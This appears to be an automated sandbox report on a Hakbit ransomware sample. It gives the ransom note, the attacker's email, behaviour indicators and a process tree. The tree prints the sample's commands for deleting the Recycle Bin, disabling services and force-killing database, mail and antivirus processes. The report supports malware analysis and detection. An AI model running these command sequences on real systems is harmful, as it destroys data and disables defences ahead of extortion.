hakbit | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

Resubmissions

22-11-2023 17:02

231122-vkac9adg64 10

19-01-2021 19:24

210119-s26yznnqsn 10

19-11-2020 13:14

201119-s41ec6lt86 10

Analysis

max time kernel
305s
max time network
381s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 13:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Score

10^/10

hakbit ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: oXDGKQK45IR5DjQ7fqtBGO8nBjmz9kOrbn2wtKMU/UeKZv0atyEJ6RZxPHpG9nbHu2NGCX+2HM74L5ypLubectZpjfoeR6qkCU1CSGblmAonaWgskRIjRylm2/JTFPh6I5qDpyNT9DceakbVn2BUfljaPrHoyNKTGcMsFqEqi/y5NB3i7211ksgJi3K9u5LCvsIcWqW8PvgNy0Ah+QPo/PMDGEESCWxlwApisTVcPjUd2UOTR0DhvT54wCET5inxnbxTSBTuZfUjIi2Y6jbKkL/hRiK4nApLH8T+oTy5gFZaVbU8UNnoGY8weQZmLQrxO4YPYiRUkB/v9Hy2gAEf9Xa5bxLeH56XuoGBZgPtrnC0L4yTemHofZwwCK5SipB0NPEnv6mU07cKQtlBlUy1Y04eEsvK6BPnaz+J3whD2KH7xOL51D/Q5TKhavcv4gPF/9dcTTBgC8j3IHHXLdWSoNmtd5+VCWKZF77+dDl2EHsKsdXFay40pmGqlbmMcwO3qtxo4b3Yg3doocsv6h+rfm/QgG7ciNuVZpo1ybx58FTWH9XgaHAwqH+CEaverTzy7/G2QNIqY8qrhzyUagDT7oLf5k4fe1p1rU9CM6oVhjV+EiMtE4HecN5UmVsps9jBD1XRfYaGe7MD3BUQ6Wu5hbanfu8fXcx08sVyHeUBOW0= Number of files that were processed is: 1231

Emails

potentialenergy@mail.ru

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\EnterApprove.tiff	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Drops startup file 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 47 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
724	taskkill.exe
2040	taskkill.exe
3800	taskkill.exe
1676	taskkill.exe
4736	taskkill.exe
3192	taskkill.exe
616	taskkill.exe
4200	taskkill.exe
4348	taskkill.exe
980	taskkill.exe
4552	taskkill.exe
4152	taskkill.exe
4292	taskkill.exe
4468	taskkill.exe
2784	taskkill.exe
1804	taskkill.exe
2004	taskkill.exe
1392	taskkill.exe
2788	taskkill.exe
4308	taskkill.exe
3860	taskkill.exe
1104	taskkill.exe
200	taskkill.exe
4456	taskkill.exe
2792	taskkill.exe
3220	taskkill.exe
4624	taskkill.exe
3644	taskkill.exe
4460	taskkill.exe
3816	taskkill.exe
4680	taskkill.exe
3948	taskkill.exe
652	taskkill.exe
1608	taskkill.exe
1092	taskkill.exe
2268	taskkill.exe
5040	taskkill.exe
4220	taskkill.exe
420	taskkill.exe
4196	taskkill.exe
2456	taskkill.exe
5112	taskkill.exe
4204	taskkill.exe
2960	taskkill.exe
4752	taskkill.exe
3712	taskkill.exe
3624	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4528 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3336 PING.EXE

pid	process
4528	notepad.exe

pid	process
3336	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid	process
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	420	taskkill.exe
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	2792	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	4196	taskkill.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	652	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	4460	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	200	taskkill.exe
Token: SeDebugPrivilege	3816	taskkill.exe
Token: SeDebugPrivilege	4680	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	2788	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	4152	taskkill.exe
Token: SeDebugPrivilege	3624	taskkill.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	616	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	4292	taskkill.exe
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	4220	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	5040	taskkill.exe
Token: SeDebugPrivilege	3544	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exenotepad.exe

pid process

4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
4528 notepad.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

4764 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	pid	process	target process
PID 4764 wrote to memory of 5104	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 5104	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 3008	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 4764 wrote to memory of 3008	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 4764 wrote to memory of 972	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 972	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 988	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 988	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 3544	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 3544	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 4764 wrote to memory of 420	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 420	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2792	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2792	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 724	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 724	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4308	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4308	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3220	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3220	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3860	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3860	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4200	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4200	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4196	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4196	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4348	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4348	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 652	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 652	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 980	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 980	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1104	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1104	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1608	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1608	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1804	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1804	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1092	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 1092	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2268	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2268	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2456	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2456	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2960	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2960	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4460	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4460	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2004	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 2004	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4552	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4552	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4624	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4624	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3644	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3644	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4752	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4752	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4736	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 4736	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 200	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 200	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3816	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 4764 wrote to memory of 3816	4764	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:5104

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:3008

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:972

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:988

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:3544

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:420

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:724

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4308

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3860

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4200

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:4552

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:200

